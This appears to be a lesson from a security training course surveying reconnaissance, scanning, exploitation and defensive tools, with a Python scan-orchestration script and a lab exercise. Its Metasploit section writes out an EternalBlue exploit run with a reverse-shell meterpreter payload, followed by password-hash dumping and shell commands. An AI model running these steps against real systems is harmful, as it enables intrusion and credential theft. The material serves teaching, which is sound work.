Lesson 8 Security Tools & Frameworks
80 minutes
Security Tools & Frameworks
Security professionals rely on specialized tools and frameworks to effectively identify, analyze, and mitigate security threats. This lesson covers essential tools across different categories of security testing and analysis.
Tool Categories Overview
Reconnaissance Tools
- Nmap: Network discovery and port scanning
- Masscan: High-speed port scanner
- Amass: In-depth attack surface mapping
- theHarvester: Email and subdomain gathering
- Shodan: Internet-connected device search
Vulnerability Scanners
- OpenVAS: Comprehensive vulnerability scanner
- Nessus: Professional vulnerability assessment
- Nikto: Web server vulnerability scanner
- Nuclei: Modern vulnerability scanner
- Qualys VMDR: Cloud-based scanning
Exploitation Tools
- Metasploit: Comprehensive exploitation framework
- Cobalt Strike: Advanced threat emulation
- Empire: PowerShell post-exploitation
- BeEF: Browser exploitation framework
- SQLMap: SQL injection exploitation
Defensive Tools
- Snort: Network intrusion detection
- Suricata: Network security monitoring
- OSSEC: Host-based intrusion detection
- Wireshark: Network protocol analyzer
- Splunk: Security information and event management
Metasploit Framework Deep Dive
Metasploit is one of the most powerful and widely used penetration testing frameworks. It provides a comprehensive platform for developing, testing, and executing exploits.
Metasploit Architecture
| Component | Description | Examples |
|---|---|---|
| Exploits | Code that takes advantage of vulnerabilities | windows/smb/ms17_010_eternalblue |
| Payloads | Code executed after successful exploitation | windows/meterpreter/reverse_tcp |
| Auxiliary | Supporting modules for scanning and enumeration | scanner/portscan/tcp |
| Encoders | Modules to evade antivirus detection | x86/shikata_ga_nai |
| Post | Post-exploitation modules | windows/gather/hashdump |
Basic Metasploit Commands
# Start Metasploit console
msfconsole
# Basic commands
msf6 > help # Show available commands
msf6 > search ms17-010 # Search for exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options # Display module options
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > exploit # Run the exploit
# Meterpreter commands (after successful exploitation)
meterpreter > sysinfo # System information
meterpreter > getuid # Current user
meterpreter > ps # List processes
meterpreter > hashdump # Dump password hashes
meterpreter > screenshot # Take screenshot
meterpreter > shell # Drop to system shellNetwork Analysis with Wireshark
Wireshark is the world's foremost network protocol analyzer, essential for network troubleshooting and security analysis.
Key Features and Use Cases
Network Troubleshooting
- Analyze network performance issues
- Identify bandwidth bottlenecks
- Debug protocol implementations
- Monitor network health
Security Analysis
- Detect malicious network activity
- Analyze attack patterns
- Investigate security incidents
- Monitor for data exfiltration
Common Wireshark Filters
# IP-based filters
ip.addr == 192.168.1.100 # Traffic to/from specific IP
ip.src == 192.168.1.100 # Traffic from specific IP
ip.dst == 192.168.1.100 # Traffic to specific IP
# Protocol filters
http # HTTP traffic only
https or ssl # HTTPS/SSL traffic
tcp.port == 80 # Traffic on port 80
udp.port == 53 # DNS traffic
# Content filters
http contains "password" # HTTP traffic containing "password"
tcp contains "GET" # TCP traffic containing "GET"
# Advanced filters
tcp.flags.syn == 1 and tcp.flags.ack == 0 # SYN packets (connection attempts)
http.response.code == 404 # HTTP 404 responses
dns.qry.name contains "malware" # DNS queries for domains containing "malware"Python Tool Integration Framework
#!/usr/bin/env python3
import subprocess
import json
import time
import os
import sys
from datetime import datetime
class SecurityToolsManager:
def __init__(self, target, output_dir="security_scan"):
self.target = target
self.output_dir = output_dir
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'tools_used': [],
'findings': []
}
# Create output directory
os.makedirs(output_dir, exist_ok=True)
def run_nmap_scan(self, scan_type="comprehensive"):
"""Run Nmap scan with different profiles"""
print(f"Running Nmap {scan_type} scan on {self.target}...")
scan_profiles = {
'quick': ['-sS', '-F', '--open'],
'comprehensive': ['-sS', '-sV', '-O', '--script=vuln', '-p-'],
'stealth': ['-sS', '-f', '-T2', '--randomize-hosts'],
'udp': ['-sU', '--top-ports', '1000']
}
nmap_cmd = ['nmap'] + scan_profiles.get(scan_type, scan_profiles['quick']) + [self.target]
try:
result = subprocess.run(nmap_cmd, capture_output=True, text=True, timeout=3600)
if result.returncode == 0:
# Save raw output
with open(f"{self.output_dir}/nmap_{scan_type}.txt", 'w') as f:
f.write(result.stdout)
# Parse results
findings = self.parse_nmap_output(result.stdout, scan_type)
self.results['tools_used'].append(f"nmap_{scan_type}")
self.results['findings'].extend(findings)
print(f"Nmap {scan_type} scan completed. Found {len(findings)} findings.")
return findings
else:
print(f"Nmap scan failed: {result.stderr}")
return []
except subprocess.TimeoutExpired:
print("Nmap scan timed out")
return []
except Exception as e:
print(f"Error running Nmap: {e}")
return []
def parse_nmap_output(self, output, scan_type):
"""Parse Nmap output for security findings"""
findings = []
lines = output.split('\n')
current_port = None
for line in lines:
line = line.strip()
# Parse open ports
if '/tcp' in line and 'open' in line:
parts = line.split()
if len(parts) >= 3:
port = parts[0].split('/')[0]
service = parts[2] if len(parts) > 2 else 'unknown'
findings.append({
'type': 'open_port',
'severity': 'info',
'port': port,
'service': service,
'description': f"Open port {port} running {service}"
})
# Parse vulnerability script results
elif 'VULNERABLE' in line:
findings.append({
'type': 'vulnerability',
'severity': 'high',
'description': line.strip(),
'tool': f"nmap_{scan_type}"
})
# Parse CVE references
elif 'CVE-' in line:
cve_match = line.strip()
findings.append({
'type': 'cve',
'severity': 'medium',
'description': f"Potential CVE identified: {cve_match}",
'tool': f"nmap_{scan_type}"
})
return findings
def run_nikto_scan(self):
"""Run Nikto web vulnerability scan"""
print(f"Running Nikto web scan on {self.target}...")
try:
# Check if web service is available first
web_ports = ['80', '443', '8080', '8443']
target_url = None
for port in web_ports:
try:
import requests
test_url = f"http://{self.target}:{port}"
response = requests.get(test_url, timeout=5)
if response.status_code < 400:
target_url = test_url
break
except:
continue
if not target_url:
# Try HTTPS
try:
test_url = f"https://{self.target}"
response = requests.get(test_url, timeout=5, verify=False)
if response.status_code < 400:
target_url = test_url
except:
pass
if not target_url:
print("No web service detected, skipping Nikto scan")
return []
# Run Nikto
nikto_cmd = ['nikto', '-h', target_url, '-Format', 'txt']
result = subprocess.run(nikto_cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0 or result.stdout: # Nikto may return non-zero but still have output
# Save raw output
with open(f"{self.output_dir}/nikto.txt", 'w') as f:
f.write(result.stdout)
# Parse results
findings = self.parse_nikto_output(result.stdout)
self.results['tools_used'].append('nikto')
self.results['findings'].extend(findings)
print(f"Nikto scan completed. Found {len(findings)} findings.")
return findings
else:
print(f"Nikto scan failed: {result.stderr}")
return []
except subprocess.TimeoutExpired:
print("Nikto scan timed out")
return []
except Exception as e:
print(f"Error running Nikto: {e}")
return []
def parse_nikto_output(self, output):
"""Parse Nikto output for web vulnerabilities"""
findings = []
lines = output.split('\n')
for line in lines:
line = line.strip()
# Look for vulnerability indicators
if any(keyword in line.lower() for keyword in ['vulnerability', 'vulnerable', 'security']):
severity = 'medium'
if any(high_keyword in line.lower() for high_keyword in ['critical', 'high', 'exploit']):
severity = 'high'
elif any(low_keyword in line.lower() for low_keyword in ['info', 'low']):
severity = 'low'
findings.append({
'type': 'web_vulnerability',
'severity': severity,
'description': line,
'tool': 'nikto'
})
# Look for specific issues
elif any(issue in line.lower() for issue in ['xss', 'sql injection', 'directory traversal']):
findings.append({
'type': 'web_vulnerability',
'severity': 'high',
'description': line,
'tool': 'nikto'
})
return findings
def run_ssl_scan(self):
"""Analyze SSL/TLS configuration"""
print(f"Running SSL analysis on {self.target}...")
try:
# Use testssl.sh if available, otherwise use nmap ssl scripts
ssl_cmd = ['nmap', '--script', 'ssl-enum-ciphers,ssl-cert,ssl-heartbleed',
'-p', '443,8443', self.target]
result = subprocess.run(ssl_cmd, capture_output=True, text=True, timeout=300)
if result.returncode == 0:
# Save raw output
with open(f"{self.output_dir}/ssl_analysis.txt", 'w') as f:
f.write(result.stdout)
# Parse results
findings = self.parse_ssl_output(result.stdout)
self.results['tools_used'].append('ssl_analysis')
self.results['findings'].extend(findings)
print(f"SSL analysis completed. Found {len(findings)} findings.")
return findings
else:
print(f"SSL analysis failed: {result.stderr}")
return []
except Exception as e:
print(f"Error running SSL analysis: {e}")
return []
def parse_ssl_output(self, output):
"""Parse SSL/TLS analysis output"""
findings = []
lines = output.split('\n')
for line in lines:
line = line.strip()
# Check for weak ciphers
if any(weak in line.lower() for weak in ['weak', 'broken', 'deprecated', 'rc4', 'des']):
findings.append({
'type': 'ssl_weakness',
'severity': 'medium',
'description': f"Weak SSL/TLS configuration: {line}",
'tool': 'ssl_analysis'
})
# Check for vulnerabilities
elif any(vuln in line.lower() for vuln in ['heartbleed', 'poodle', 'beast', 'crime']):
findings.append({
'type': 'ssl_vulnerability',
'severity': 'high',
'description': f"SSL/TLS vulnerability detected: {line}",
'tool': 'ssl_analysis'
})
return findings
def run_comprehensive_scan(self):
"""Run all available security tools"""
print(f"Starting comprehensive security scan of {self.target}")
print("=" * 60)
all_findings = []
# Run different types of scans
scan_methods = [
('nmap_quick', lambda: self.run_nmap_scan('quick')),
('nmap_comprehensive', lambda: self.run_nmap_scan('comprehensive')),
('nikto', self.run_nikto_scan),
('ssl_analysis', self.run_ssl_scan)
]
for scan_name, scan_method in scan_methods:
try:
print(f"\n--- Running {scan_name} ---")
findings = scan_method()
all_findings.extend(findings)
time.sleep(2) # Brief pause between scans
except KeyboardInterrupt:
print(f"\nScan interrupted during {scan_name}")
break
except Exception as e:
print(f"Error during {scan_name}: {e}")
continue
# Generate comprehensive report
self.generate_comprehensive_report(all_findings)
return all_findings
def generate_comprehensive_report(self, findings):
"""Generate comprehensive security report"""
# Update results
self.results['findings'] = findings
self.results['total_findings'] = len(findings)
self.results['end_time'] = datetime.now().isoformat()
# Save JSON results
with open(f"{self.output_dir}/comprehensive_results.json", 'w') as f:
json.dump(self.results, f, indent=2)
# Generate text report
report_lines = []
report_lines.append("COMPREHENSIVE SECURITY ASSESSMENT REPORT")
report_lines.append("=" * 60)
report_lines.append(f"Target: {self.target}")
report_lines.append(f"Scan Date: {self.results['timestamp']}")
report_lines.append(f"Tools Used: {', '.join(self.results['tools_used'])}")
report_lines.append("")
# Executive Summary
severity_counts = {'critical': 0, 'high': 0, 'medium': 0, 'low': 0, 'info': 0}
for finding in findings:
severity = finding.get('severity', 'info').lower()
severity_counts[severity] = severity_counts.get(severity, 0) + 1
report_lines.append("EXECUTIVE SUMMARY")
report_lines.append("-" * 20)
report_lines.append(f"Total Findings: {len(findings)}")
for severity, count in severity_counts.items():
if count > 0:
report_lines.append(f"{severity.capitalize()}: {count}")
report_lines.append("")
# Detailed Findings
if findings:
report_lines.append("DETAILED FINDINGS")
report_lines.append("-" * 20)
# Group by severity
for severity in ['critical', 'high', 'medium', 'low', 'info']:
severity_findings = [f for f in findings if f.get('severity', '').lower() == severity]
if severity_findings:
report_lines.append(f"\n{severity.upper()} SEVERITY ({len(severity_findings)} findings):")
report_lines.append("-" * 30)
for i, finding in enumerate(severity_findings, 1):
report_lines.append(f"{i}. {finding['description']}")
if 'tool' in finding:
report_lines.append(f" Tool: {finding['tool']}")
if 'port' in finding:
report_lines.append(f" Port: {finding['port']}")
report_lines.append("")
else:
report_lines.append("No security findings detected.")
# Recommendations
report_lines.append("\nRECOMMendations")
report_lines.append("-" * 15)
if severity_counts['critical'] > 0 or severity_counts['high'] > 0:
report_lines.append("• Immediate action required for critical and high-severity findings")
report_lines.append("• Conduct thorough vulnerability assessment")
report_lines.append("• Implement security patches and updates")
if severity_counts['medium'] > 0:
report_lines.append("• Address medium-severity findings within 30 days")
report_lines.append("• Review security configurations")
report_lines.append("• Implement regular security scanning")
report_lines.append("• Conduct penetration testing")
report_lines.append("• Train staff on security best practices")
# Save text report
with open(f"{self.output_dir}/comprehensive_report.txt", 'w') as f:
f.write('\n'.join(report_lines))
print(f"\n{'='*60}")
print("COMPREHENSIVE SECURITY SCAN COMPLETED")
print(f"{'='*60}")
print(f"Total findings: {len(findings)}")
print(f"Results saved to: {self.output_dir}/")
print("Generated files:")
print("- comprehensive_results.json (detailed results)")
print("- comprehensive_report.txt (summary report)")
print("- Individual tool outputs")
def main():
if len(sys.argv) != 2:
print("Usage: python3 security_tools_manager.py ")
print("Example: python3 security_tools_manager.py example.com")
sys.exit(1)
target = sys.argv[1]
print("Security Tools Manager")
print(f"Target: {target}")
print("=" * 40)
# Initialize tools manager
tools_manager = SecurityToolsManager(target)
try:
# Run comprehensive scan
findings = tools_manager.run_comprehensive_scan()
except KeyboardInterrupt:
print("\nScan interrupted by user")
except Exception as e:
print(f"Scan failed: {e}")
if __name__ == "__main__":
main()
Tool Selection Guidelines
Choosing the Right Tools
Consider These Factors:
- Purpose: What are you trying to achieve?
- Scope: Network, web app, or host-based testing?
- Environment: Internal vs external testing
- Stealth: Do you need to avoid detection?
- Compliance: Industry or regulatory requirements
Best Practices:
- Start with passive reconnaissance
- Use multiple tools for validation
- Understand tool limitations
- Keep tools updated
- Document tool configurations
Popular Security Distributions
Kali Linux
Most popular penetration testing distribution with 600+ pre-installed tools
- Debian-based
- Regular updates
- Extensive documentation
- Active community
Parrot Security OS
Privacy-focused security distribution with lightweight design
- Debian-based
- AnonSurf for anonymity
- Cryptocurrency support
- Home and cloud editions
BlackArch Linux
Arch-based distribution with over 2000 security tools
- Arch Linux-based
- Largest tool collection
- Rolling release model
- Modular installation
Exercise
Security Tools Hands-On Lab
Objective: Practice using various security tools in a controlled environment.
- Tool Setup:
- Set up a Kali Linux VM or use existing tools
- Install additional tools if needed
- Configure target test environment
- Reconnaissance Phase:
- Use Nmap for network discovery
- Run theHarvester for information gathering
- Perform DNS enumeration
- Vulnerability Assessment:
- Run OpenVAS or Nessus scan
- Use Nikto for web vulnerability testing
- Analyze SSL/TLS configuration
- Tool Integration:
- Run the Python security tools manager
- Compare results from different tools
- Create comprehensive report
Only use these tools on systems you own or have explicit authorization to test!
Tool Maintenance and Updates
Keeping Tools Current
- Regular Updates: Keep tools updated with latest signatures and capabilities
- Vulnerability Databases: Update CVE databases and exploit collections
- Configuration Management: Maintain consistent tool configurations
- Testing: Verify tools work correctly after updates
- Documentation: Keep usage documentation current
Lesson 8 of 10